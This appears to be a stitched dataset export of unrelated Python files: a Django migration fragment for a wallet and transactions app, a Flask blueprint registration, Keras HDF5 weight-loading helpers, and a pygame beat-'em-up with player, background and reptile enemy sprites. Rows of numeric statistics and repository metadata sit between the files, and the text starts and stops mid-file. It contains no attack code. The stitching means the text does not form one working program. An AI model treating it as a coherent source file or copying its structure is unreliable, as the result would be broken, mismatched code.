initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='AccountSetting',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('curr_unit', models.FloatField(blank=True, default=0, null=True)),
('min_redeem_refer_credit', models.FloatField(blank=True, default=1000, null=True)),
('auto_approve', models.BooleanField(blank=True, default=False, null=True)),
('withraw_factor', models.FloatField(blank=True, default=1, null=True)),
],
options={
'db_table': 'd_accounts_setup',
},
),
migrations.CreateModel(
name='C2BTransaction',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('phone_number', models.BigIntegerField(blank=True, null=True)),
('amount', models.DecimalField(decimal_places=2, max_digits=20)),
('success', models.BooleanField(blank=True, default=False, null=True)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Currency',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('name', models.CharField(blank=True, max_length=30, null=True)),
('rate', models.DecimalField(blank=True, decimal_places=5, max_digits=6, null=True)),
],
options={
'db_table': 'd_currency',
},
),
migrations.CreateModel(
name='RegisterUrl',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('success', models.BooleanField(blank=True, default=False, null=True)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='RefCreditTransfer',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('amount', models.DecimalField(decimal_places=2, default=0, max_digits=12, verbose_name='amount')),
('succided', models.BooleanField(blank=True, default=False, null=True)),
('user', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='user_refer_credit_trans', to=settings.AUTH_USER_MODEL)),
],
options={
'db_table': 'd_refcredit_trans',
'ordering': ('-created_at',),
},
),
migrations.CreateModel(
name='RefCredit',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('amount', models.DecimalField(decimal_places=2, default=0, max_digits=6)),
('current_bal', models.DecimalField(blank=True, decimal_places=2, max_digits=12, null=True)),
('credit_from', models.CharField(blank=True, max_length=200, null=True)),
('closed', models.BooleanField(blank=True, null=True)),
('has_record', models.BooleanField(blank=True, null=True)),
('approved', models.BooleanField(blank=True, default=False, null=True)),
('user', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='ref_accountcredit_users', to=settings.AUTH_USER_MODEL)),
],
options={
'db_table': 'd_refcredits',
},
),
migrations.CreateModel(
name='Checkout',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('email', models.EmailField(blank=True, max_length=254, null=True)),
('amount', models.DecimalField(decimal_places=2, max_digits=20)),
('paid', models.BooleanField(blank=True, default=False, null=True)),
('success', models.BooleanField(blank=True, default=False, null=True)),
('user', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='checkouts', to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='CashWithrawal',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('amount', models.DecimalField(decimal_places=2, max_digits=12)),
('address', models.CharField(blank=True, max_length=100, null=True)),
('approved', models.BooleanField(blank=True, default=False, null=True)),
('cancelled', models.BooleanField(blank=True, default=False, null=True)),
('withrawned', models.BooleanField(blank=True, null=True)),
('has_record', models.BooleanField(blank=True, null=True)),
('active', models.BooleanField(blank=True, default=True, null=True)),
('currency_id', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='account.currency')),
('user', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='user_withrawals', to=settings.AUTH_USER_MODEL)),
],
options={
'db_table': 'd_withrawals',
},
),
migrations.CreateModel(
name='CashTransfer',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('amount', models.DecimalField(decimal_places=2, max_digits=20)),
('approved', models.BooleanField(blank=True, default=False, null=True)),
('success', models.BooleanField(blank=True, null=True)),
('recipient', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='recipientss', to=settings.AUTH_USER_MODEL)),
('sender', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='senderss', to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='CashDeposit',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('amount', models.DecimalField(decimal_places=2, max_digits=12)),
('confirmed', models.BooleanField(blank=True, default=False, null=True)),
('deposited', models.BooleanField(blank=True, null=True)),
('deposit_type', models.CharField(blank=True, default='Shop Deposit', max_length=100, null=True)),
('has_record', models.BooleanField(blank=True, null=True)),
('currency_id', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='account.currency')),
('user', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='user_deposits', to=settings.AUTH_USER_MODEL)),
],
options={
'db_table': 'd_deposits',
},
),
migrations.CreateModel(
name='Account',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('token_count', models.IntegerField(blank=True, default=0, null=True)),
('balance', models.DecimalField(blank=True, decimal_places=2, default=0, max_digits=12, null=True)),
('actual_balance', models.DecimalField(blank=True, decimal_places=2, default=0, max_digits=12, null=True)),
('withraw_power', models.DecimalField(blank=True, decimal_places=2, default=0, max_digits=12, null=True)),
('refer_balance', models.DecimalField(blank=True, decimal_places=2, default=0, max_digits=12, null=True)),
('trial_balance', models.DecimalField(blank=True, decimal_places=2, default=50000, max_digits=12, null=True)),
('cum_deposit', models.DecimalField(blank=True, decimal_places=2, default=0.0, max_digits=12, null=True)),
('cum_withraw', models.DecimalField(blank=True, decimal_places=2, default=0.0, max_digits=12, null=True)),
('active', models.BooleanField(blank=True, default=True, null=True)),
('user', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', to=settings.AUTH_USER_MODEL)),
],
options={
'db_table': 'd_accounts',
'ordering': ('-user_id',),
},
),
]
| 58.507614 | 181 | 0.595957 | 1,221 | 11,526 | 5.452907 | 0.121212 | 0.085311 | 0.075698 | 0.082607 | 0.824872 | 0.803545 | 0.756383 | 0.750225 | 0.728747 | 0.690748 | 0 | 0.011504 | 0.260888 | 11,526 | 196 | 182 | 58.806122 | 0.770043 | 0.003904 | 0 | 0.582011 | 1 | 0 | 0.107326 | 0.006011 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.015873 | 0 | 0.037037 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
694fc946a75c2cd08fb1c39bc482a958550cdb58 | 133 | py | Python | spug_api/apps/account/__init__.py | lucasaytt/arena_platform | 16a8c682e71d90b62c746da126cafc8e6444fe5f | [
"MIT"
] | null | null | null | spug_api/apps/account/__init__.py | lucasaytt/arena_platform | 16a8c682e71d90b62c746da126cafc8e6444fe5f | [
"MIT"
] | null | null | null | spug_api/apps/account/__init__.py | lucasaytt/arena_platform | 16a8c682e71d90b62c746da126cafc8e6444fe5f | [
"MIT"
] | null | null | null | from apps.account import user
def register_blueprint(app):
app.register_blueprint(user.blueprint, url_prefix='/account/users')
| 22.166667 | 71 | 0.789474 | 18 | 133 | 5.666667 | 0.666667 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.105263 | 133 | 5 | 72 | 26.6 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0.105263 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0 | 0.666667 | 0.666667 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 7 |
6964bd1411237b1be83914cc943b0f420876c950 | 12,724 | py | Python | utils/misc.py | JingweiJ/JointActorActionSeg | d33904f3f2c02094bb0a32bfec3105affff59426 | [
"MIT"
] | 11 | 2018-12-12T00:44:09.000Z | 2022-01-24T13:25:37.000Z | utils/misc.py | JingweiJ/JointActorActionSeg | d33904f3f2c02094bb0a32bfec3105affff59426 | [
"MIT"
] | 1 | 2019-04-24T08:25:12.000Z | 2019-04-24T08:25:12.000Z | utils/misc.py | JingweiJ/JointActorActionSeg | d33904f3f2c02094bb0a32bfec3105affff59426 | [
"MIT"
] | 3 | 2018-12-21T08:13:20.000Z | 2020-07-08T22:54:09.000Z | import numpy as np
import keras.backend as K
from keras.engine.topology import preprocess_weights_for_loading
import warnings
def RGB2Hex(R, G, B):
assert R in range(256) and G in range(256) and B in range(256)
return '0x' + '%06x' % (R * 256**2 + G * 256 + B)
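A quick sanity check for `RGB2Hex` (a self-contained sketch reproducing the helper above): the three 8-bit channels are packed into a `'0x'`-prefixed six-digit hex string.

```python
def RGB2Hex(R, G, B):
    # Pack 8-bit R, G, B channels into a '0x'-prefixed six-digit hex string.
    assert R in range(256) and G in range(256) and B in range(256)
    return '0x' + '%06x' % (R * 256**2 + G * 256 + B)

print(RGB2Hex(255, 0, 0))    # '0xff0000'
print(RGB2Hex(0, 128, 255))  # '0x0080ff'
```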
def mask2bbox(mask, mode='xywh'):
'''
@input
mask: np array of (h, w). Entries are 0 (background) or 1 (foreground).
@return
a tuple of (x, y, w, h), where (x, y) are the coordinates of the upper-left corner of the bbox,
and w, h are its width and height (computed as max - min over the foreground pixels).
'''
h, w = mask.shape
fg_loc = np.where(mask)
if mode == 'xywh':
y = np.min(fg_loc[0])
h = np.max(fg_loc[0]) - y
x = np.min(fg_loc[1])
w = np.max(fg_loc[1]) - x
return (x, y, w, h)
else:
raise NotImplementedError()
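A minimal worked example of `mask2bbox` (self-contained copy of the function above). Note that, per this file's convention, `w` and `h` are max minus min, i.e. one less than the pixel count along each axis.

```python
import numpy as np

def mask2bbox(mask, mode='xywh'):
    # Bounding box of the foreground (nonzero) pixels, in this file's
    # convention: w = max_col - min_col, h = max_row - min_row.
    fg_loc = np.where(mask)
    if mode == 'xywh':
        y = np.min(fg_loc[0])
        h = np.max(fg_loc[0]) - y
        x = np.min(fg_loc[1])
        w = np.max(fg_loc[1]) - x
        return (x, y, w, h)
    raise NotImplementedError()

mask = np.zeros((5, 5), dtype=int)
mask[1:3, 2:5] = 1  # foreground rows 1-2, cols 2-4
print(mask2bbox(mask))  # (2, 1, 2, 1)
```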
def load_weights_from_hdf5_group_by_weights_name(f, weights, weight_name_map={}, verbose=False):
''' f: a hdf5 group of weights.
weights: weights in the current graph to be assigned.
weight_name_map: {key: value} == {weight name in current graph: corresponding weight name in f}
verbose: if True, print weight value tuples before assigning.
'''
weight_value_tuples = []
for w in weights:
try:
if w.name in weight_name_map:
match_weight_name = weight_name_map[w.name]
else:
match_weight_name = w.name
weight_value_tuples.append(
(w, f[match_weight_name])
)
except:
print('Error!')
print(w, w.name, match_weight_name)
if verbose:
print('Weight value tuples:')
from pprint import pprint
pprint(weight_value_tuples)
K.batch_set_value(weight_value_tuples)
def load_weights_from_hdf5_group_by_name(f, layers, layer_name_map={}, skip_mismatch=False, verbose=False, verboseverbose=False):
"""
Adapted from the function with the same name in keras.engine.topology.
Added warnings when a layer in the hdf5 file fails to match any layers
in argument `layers`. Also print all assigned weights' names.
Implements name-based weight loading.
(instead of topological weight loading).
Layers that have no matching name are skipped.
# Arguments
f: A pointer to a HDF5 group.
layers: A list of target layers.
skip_mismatch: Boolean, whether to skip loading of layers
where there is a mismatch in the number of weights,
or a mismatch in the shape of the weights.
# Raises
ValueError: in case of mismatch between provided layers
and weights file and skip_mismatch=False.
"""
if 'keras_version' in f.attrs:
original_keras_version = f.attrs['keras_version'].decode('utf8')
else:
original_keras_version = '1'
if 'backend' in f.attrs:
original_backend = f.attrs['backend'].decode('utf8')
else:
original_backend = None
# New file format.
layer_names = [n.decode('utf8') for n in f.attrs['layer_names']]
# Reverse index of layer name to list of layers with name.
index = {}
for layer in layers:
if layer.name:
if layer.name in layer_name_map:
index.setdefault(layer_name_map[layer.name], []).append(layer)
else:
index.setdefault(layer.name, []).append(layer)
# We batch weight value assignments in a single backend call
# which provides a speedup in TensorFlow.
weight_value_tuples = []
for k, name in enumerate(layer_names):
g = f[name]
weight_names = [n.decode('utf8') for n in g.attrs['weight_names']]
weight_values = [g[weight_name] for weight_name in weight_names]
for layer in index.get(name, []):
symbolic_weights = layer.weights
# Skip preprocessing
#weight_values = preprocess_weights_for_loading(
# layer,
# weight_values,
# original_keras_version,
# original_backend)
if len(weight_values) != len(symbolic_weights):
if skip_mismatch:
warnings.warn('Skipping loading of weights for layer {}'.format(layer.name) +
' due to mismatch in number of weights' +
' ({} vs {}).'.format(len(symbolic_weights), len(weight_values)))
continue
else:
raise ValueError('Layer #' + str(k) +
' (named "' + layer.name +
'") expects ' +
str(len(symbolic_weights)) +
' weight(s), but the saved weights' +
' have ' + str(len(weight_values)) +
' element(s).')
# Set values.
for i in range(len(weight_values)):
if skip_mismatch:
# weights' order in `symbolic_weights` may not align with the order in `weight_values` and `weight_names`.
try:
if K.int_shape(symbolic_weights[i]) != weight_values[weight_names.index(symbolic_weights[i].name)].shape:
warnings.warn('Skipping loading of weights for layer {}'.format(layer.name) +
' due to mismatch in shape' +
' ({} vs {}).'.format(
symbolic_weights[i].shape,
weight_values[weight_names.index(symbolic_weights[i].name)].shape))
continue
except:
from pdb import set_trace; set_trace()
weight_value_tuples.append((symbolic_weights[i],
weight_values[weight_names.index(symbolic_weights[i].name)]))
if len(weight_value_tuples) == 0:
warnings.warn('No layer is loaded.')
#return
weights_in_layers = []
for layer in layers:
if layer.weights:
weights_in_layers += layer.weights
weights_to_be_assigned = [x for x, _ in weight_value_tuples]
for wil in weights_in_layers:
if wil not in weights_to_be_assigned:
if verbose:
warnings.warn('%s is not loaded.' % wil.name)
if verboseverbose:
print('Weight value tuples:')
from pprint import pprint
pprint(weight_value_tuples)
K.batch_set_value(weight_value_tuples)
def load_weights_from_hdf5_group_by_name_assume_weight_order(f, layers, layer_name_map={}, skip_mismatch=False, verbose=False):
"""
Adapted from the function with the same name in keras.engine.topology.
Added warnings when a layer in the hdf5 file fails to match any layers
in argument `layers`. Also print all assigned weights' names.
Implements name-based weight loading.
(instead of topological weight loading).
Layers that have no matching name are skipped.
# Arguments
f: A pointer to a HDF5 group.
layers: A list of target layers.
skip_mismatch: Boolean, whether to skip loading of layers
where there is a mismatch in the number of weights,
or a mismatch in the shape of the weights.
# Raises
ValueError: in case of mismatch between provided layers
and weights file and skip_mismatch=False.
"""
if 'keras_version' in f.attrs:
original_keras_version = f.attrs['keras_version'].decode('utf8')
else:
original_keras_version = '1'
if 'backend' in f.attrs:
original_backend = f.attrs['backend'].decode('utf8')
else:
original_backend = None
# New file format.
layer_names = [n.decode('utf8') for n in f.attrs['layer_names']]
# Reverse index of layer name to list of layers with name.
index = {}
for layer in layers:
if layer.name:
if layer.name in layer_name_map:
index.setdefault(layer_name_map[layer.name], []).append(layer)
else:
index.setdefault(layer.name, []).append(layer)
# We batch weight value assignments in a single backend call
# which provides a speedup in TensorFlow.
weight_value_tuples = []
for k, name in enumerate(layer_names):
g = f[name]
weight_names = [n.decode('utf8') for n in g.attrs['weight_names']]
weight_values = [g[weight_name] for weight_name in weight_names]
for layer in index.get(name, []):
symbolic_weights = layer.weights
weight_values = preprocess_weights_for_loading(
layer,
weight_values,
original_keras_version,
original_backend)
if len(weight_values) != len(symbolic_weights):
if skip_mismatch:
warnings.warn('Skipping loading of weights for layer {}'.format(layer.name) +
' due to mismatch in number of weights' +
' ({} vs {}).'.format(len(symbolic_weights), len(weight_values)))
continue
else:
raise ValueError('Layer #' + str(k) +
' (named "' + layer.name +
'") expects ' +
str(len(symbolic_weights)) +
' weight(s), but the saved weights' +
' have ' + str(len(weight_values)) +
' element(s).')
# Set values.
for i in range(len(weight_values)):
if skip_mismatch:
if K.int_shape(symbolic_weights[i]) != weight_values[i].shape:
warnings.warn('Skipping loading of weights for layer {}'.format(layer.name) +
' due to mismatch in shape' +
' ({} vs {}).'.format(
symbolic_weights[i].shape,
weight_values[i].shape))
continue
weight_value_tuples.append((symbolic_weights[i],
weight_values[i]))
if len(weight_value_tuples) == 0:
warnings.warn('No layer is loaded.')
#return
weights_in_layers = []
for layer in layers:
if layer.weights:
weights_in_layers += layer.weights
weights_to_be_assigned = [x for x, _ in weight_value_tuples]
for wil in weights_in_layers:
if wil not in weights_to_be_assigned:
if verbose:
warnings.warn('%s is not loaded.' % wil.name)
if verbose:
print('Weight value tuples:')
from pprint import pprint
pprint(weight_value_tuples)
K.batch_set_value(weight_value_tuples)
def get_cross_label(actor_label, action_label, num_actor_class, num_action_class):
''' Given actor label and action label, compute the cross-product label.
Inverse function of `decouple_cross_label`.
actor_label: size of (batch_size, ), values are {1, ..., num_actor_class}.
action_label: size of (batch_size, ), values are {1, ..., num_action_class}.
num_actor_class: not including 'BG'. e.g. in A2D, num_actor_class = 7
num_action_class: not including 'BG'. e.g. in A2D, num_action_class = 9
return:
cross_label: size of (batch_size,), int, values are {1, ..., num_actor_class
* num_action_class}.
'''
cross_label = (actor_label - 1) * num_action_class + action_label
return cross_label
def decouple_cross_label(cross_label, num_actor_class, num_action_class):
''' Given the cross-product label, compute the actor label and action label.
Inverse function of `get_cross_label`.
cross_label: size of (batch_size,), int, values are {1, ..., num_actor_class
* num_action_class}.
num_actor_class: not including 'BG'. e.g. in A2D, num_actor_class = 7
num_action_class: not including 'BG'. e.g. in A2D, num_action_class = 9
return:
actor_label: size of (batch_size, ), values are {1, ..., num_actor_class}.
action_label: size of (batch_size, ), values are {1, ..., num_action_class}.
'''
actor_label = (cross_label - 1) // num_action_class + 1
action_label = cross_label - (actor_label - 1) * num_action_class
return actor_label, action_label
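The two helpers above are inverses of each other; with A2D's 7 actor and 9 action classes (self-contained copies of the functions above):

```python
def get_cross_label(actor_label, action_label, num_actor_class, num_action_class):
    # 1-based (actor, action) labels -> 1-based cross-product label.
    return (actor_label - 1) * num_action_class + action_label

def decouple_cross_label(cross_label, num_actor_class, num_action_class):
    # Inverse mapping: 1-based cross-product label -> (actor, action).
    actor_label = (cross_label - 1) // num_action_class + 1
    action_label = cross_label - (actor_label - 1) * num_action_class
    return actor_label, action_label

print(get_cross_label(3, 5, 7, 9))     # 23, i.e. (3 - 1) * 9 + 5
print(decouple_cross_label(23, 7, 9))  # (3, 5)

# Round-trip over all 7 x 9 label pairs:
assert all(
    decouple_cross_label(get_cross_label(a, b, 7, 9), 7, 9) == (a, b)
    for a in range(1, 8) for b in range(1, 10)
)
```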
| 41.718033 | 129 | 0.576941 | 1,564 | 12,724 | 4.5 | 0.131074 | 0.034385 | 0.048309 | 0.01364 | 0.806763 | 0.797101 | 0.796817 | 0.792697 | 0.772236 | 0.754618 | 0 | 0.007662 | 0.333307 | 12,724 | 304 | 130 | 41.855263 | 0.821997 | 0.279158 | 0 | 0.730769 | 0 | 0 | 0.090314 | 0 | 0 | 0 | 0 | 0 | 0.005495 | 1 | 0.038462 | false | 0 | 0.043956 | 0 | 0.104396 | 0.06044 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c6056747de305c8bb0bfb215b324e56ae908d9f7 | 31,907 | py | Python | clases2.py | alejoso76/Wolverine-beat-em-up-FINAL | ffc644083a5e74e6c785e3668721ec60e112bdc9 | [
"MIT"
] | 1 | 2021-05-22T20:06:51.000Z | 2021-05-22T20:06:51.000Z | clases2.py | alejoso76/Wolverine-beat-em-up-FINAL | ffc644083a5e74e6c785e3668721ec60e112bdc9 | [
"MIT"
] | null | null | null | clases2.py | alejoso76/Wolverine-beat-em-up-FINAL | ffc644083a5e74e6c785e3668721ec60e112bdc9 | [
"MIT"
] | null | null | null | import pygame
import random
import math
bite=pygame.mixer.Sound('bite.ogg')
cry=pygame.mixer.Sound('cry.ogg')
channel6 = pygame.mixer.Channel(5)
def recortarReptV2(archivo):
fondo=pygame.image.load(archivo)
infoFondo=fondo.get_rect()
matriz=[]
idleR=[]
idleL=[]
walkR=[]
walkL=[]
attack1R=[]
attack1L=[]
dieR=[]
dieL=[]
idle=[[5, 51, 228, 174], [280, 51, 228, 174], [552, 51, 228, 174], [825, 51, 228, 174], [1091, 51, 228, 174]]
walkRight=[[0, 321, 228, 174] , [294, 321, 228, 174] , [554, 321, 228, 174] , [816, 321, 228, 174] , [1092, 321, 228, 174] ,[1362, 321, 228, 174] ]
attack1=[[0,605,228,180], [282,554,228,227], [535,554,228,227], [820,554,228,227], [1108,605,192,180]]
die=[[262, 111, 55, 57], [328, 111, 67, 57], [404, 11, 74, 57]]
#Idle R-L
for x in range(5):
cuadro=fondo.subsurface(idle[x])
#cuadro=pygame.transform.scale(cuadro, (100, 125))
cuadro2=pygame.transform.flip(cuadro, True, False)
#cuadro2=pygame.transform.scale(cuadro2, (100, 125))
idleR.append(cuadro)
idleL.append(cuadro2)
#Walk R-L
for x in range(6):
cuadro=fondo.subsurface(walkRight[x])
#cuadro=pygame.transform.scale(cuadro, (100, 125))
cuadro2=pygame.transform.flip(cuadro, True, False)
#cuadro2=pygame.transform.scale(cuadro2, (100, 125))
walkR.append(cuadro)
walkL.append(cuadro2)
#Attack 1 R-L
for x in range(5):
cuadro=fondo.subsurface(attack1[x])
#cuadro=pygame.transform.scale(cuadro, (100, 125))
cuadro2=pygame.transform.flip(cuadro, True, False)
#cuadro2=pygame.transform.scale(cuadro2, (100, 125))
attack1R.append(cuadro)
attack1L.append(cuadro2)
#Die 1 R-L
for x in range(3):
cuadro=fondo.subsurface(die[x])
#cuadro=pygame.transform.scale(cuadro, (100, 125))
cuadro2=pygame.transform.flip(cuadro, True, False)
#cuadro2=pygame.transform.scale(cuadro2, (100, 125))
dieR.append(cuadro)
dieL.append(cuadro2)
return idleR, idleL, walkR, walkL, attack1R, attack1L, dieR, dieL
def recortarRept(max_x, max_y, archivo, vector):
imagen=pygame.image.load(archivo)
info=imagen.get_rect()
an_imagen=info[2]
al_imagen=info[3]
an_image_corte= an_imagen/max_x
al_image_corte= al_imagen/max_y
mapa=[]
for i in range(max_y):
mapis=[]
for j in range(vector[i]):
cuadro=imagen.subsurface(j*an_image_corte, i*al_image_corte, an_image_corte, al_image_corte)
mapis.append(cuadro)
mapa.append(mapis)
return mapa
class fondo(pygame.sprite.Sprite):
def __init__(self):
pygame.sprite.Sprite.__init__(self)
self.image=pygame.image.load("stage11.png")
self.rect=self.image.get_rect()
self.rect.x=0
self.rect.y=-50
self.varx=0
self.vary=0
self.mov=True
def update(self):
self.rect.x=self.rect.x-self.varx
self.rect.y=self.rect.y+self.vary
def movefondo(self):
self.rect.x=self.rect.x-self.varx
class jugador(pygame.sprite.Sprite):
def __init__(self, matriz):
pygame.sprite.Sprite.__init__(self)
self.m=matriz
self.image=self.m[0][0]
self.rect=self.image.get_rect()
self.varx=0
self.vary=0
self.j=0
self.rect.x=300
self.rect.y=250
self.salud=100
self.accion=0
self.puntaje=0
self.dir=True
self.mov=False
self.c=0
self.cambiodir=0
self.flag=True
self.Tmuerte=5
self.Tesperar=10
self.sonido=pygame.mixer.Sound('golpes2.mp3')
self.Tiempo=120
def update(self):
if self.dir:
self.accion=self.accion
else:
if self.flag:
self.accion=self.accion+self.cambiodir
self.flag=False
self.rect.x=self.rect.x+self.varx
self.rect.y=self.rect.y+self.vary
self.image=self.m[self.accion][self.j]
self.j+=1
if self.j>=len(self.m[self.accion]):
self.j=0
if self.dir:
if not (self.accion==0) and self.mov:
self.accion=0
self.varx=0
else:
if not (self.accion==8) and self.mov:
self.accion=8
self.varx=0
if self.salud<=0:
self.Tmuerte-=1
if self.Tesperar>0:
self.Tesperar-=1
if self.Tesperar==0:
self.Tiempo-=1
self.Tesperar=10
class barravida_enemigo(pygame.sprite.Sprite):
def __init__ (self, vector, pos):
pygame.sprite.Sprite.__init__(self)
self.v=vector
self.image=self.v[0][0]
self.rect=self.image.get_rect()
self.i=0
self.varx=0
self.rect.midbottom=pos
def update(self, pos):
self.rect.midbottom=pos
def comoloquierollamar(self):
self.i+=1
if self.i>=4:
self.i=4
self.image=self.v[0][self.i]
class Reptil2(pygame.sprite.Sprite):
    def __init__(self, matriz):
        pygame.sprite.Sprite.__init__(self)
        self.f=matriz
        self.image=self.f[0][0]
        self.rect=self.image.get_rect()
        self.indice=0
        self.rect.x=900
        self.rect.y=500
        self.accion=0
        self.dir = 'R'
        self._health = 100
        self.finished = False
        self.canDie = False
        self.prevkey = None
        self.vel_y = 0
        self.vel_x = 0
        self.vel_x_value = 10
        self.vel_y_value = 6
        self.moverange = 50
        self.movetime = random.randrange(0,100)
    def getHealth(self):
        return self._health
    def getSlope(self, posJugador):
        point1 = [self.rect.x, self.rect.y]
        if self.rect.x == posJugador[0]:
            return False
        m = float(posJugador[1] - point1[1])/(posJugador[0] - point1[0])
        b = posJugador[1] - m*posJugador[0]
        return [m, b]
    def isAttacking(self):
        if self.prevkey in ['AL', 'AR']:
            return True
        else:
            return False
    def AImove(self, jugador1, jugador2 = None, noplayers = 1):
        if self.accion not in [6,7]:
            self.movetime -= 1
            if self.movetime <= -50:
                self.movetime = random.randrange(0,50)
                self.move('I')
            if self.movetime <= 0:
                if noplayers == 1:
                    selectplayer = jugador1
                else:
                    distanceplayer1 = math.fabs(jugador1.rect.x-self.rect.x)+math.fabs(jugador1.rect.y-self.rect.y)
                    distanceplayer2 = math.fabs(jugador2.rect.x-self.rect.x)+math.fabs(jugador2.rect.y-self.rect.y)
                    if distanceplayer1 > distanceplayer2:
                        selectplayer = jugador2
                    else:
                        selectplayer = jugador1
                if math.fabs(selectplayer.rect.x - self.rect.x) <= self.moverange and math.fabs(selectplayer.rect.y- self.rect.y) <= self.moverange/4:
                    if selectplayer.rect.x - self.rect.x > 0:
                        self.move('AR')
                    else:
                        self.move('AL')
                else:
                    movedir = random.randrange(0,2)
                    discardedy = False
                    if movedir:
                        if selectplayer.rect.y - self.rect.y > self.moverange/4:
                            self.vel_y = self.vel_y_value
                            if selectplayer.rect.x - self.rect.x > 0:
                                self.move('R')
                            else:
                                self.move('L')
                        elif selectplayer.rect.y - self.rect.y < -self.moverange/4:
                            self.vel_y = -self.vel_y_value
                            if selectplayer.rect.x - self.rect.x > 0:
                                self.move('R')
                            else:
                                self.move('L')
                        else:
                            discardedy = True
                    # plain "if" instead of the original "elif": an elif could
                    # never see discardedy=True set by the branch above
                    if discardedy or movedir == 0:
                        if selectplayer.rect.x - self.rect.x > self.moverange:
                            self.vel_x = self.vel_x_value
                            if selectplayer.rect.x - self.rect.x > 0:
                                self.move('R')
                            else:
                                self.move('L')
                        elif selectplayer.rect.x - self.rect.x < -self.moverange:
                            self.vel_x = -self.vel_x_value
                            if selectplayer.rect.x - self.rect.x > 0:
                                self.move('R')
                            else:
                                self.move('L')
        random.seed(pygame.time.get_ticks())
    def die(self):
        if not self.accion in [6,7]:
            # self.move is a method; the original compared it to strings,
            # which is always False. prevkey holds the last movement key.
            if self.dir=='R' or self.prevkey=='R' or self.prevkey=='AR' or self.prevkey=='I':
                self.accion=6
                self.finished = False
            elif self.dir=='L' or self.prevkey=='L' or self.prevkey=='AL':
                self.accion=7
                self.finished = False
            else:
                pass
    def move(self, key):
        if (self.finished and self.prevkey in ['AL', 'AR']) or self.prevkey not in ['AL', 'AR'] :
            self.finished = False
            if key == 'R':
                self.accion = 2
            elif key == 'L':
                self.accion = 3
            elif key == 'AR':
                self.accion = 4
            elif key == 'AL':
                self.accion = 5
            elif key == 'I':
                self.accion = 0
            self.prevkey = key
            self.indice = 0
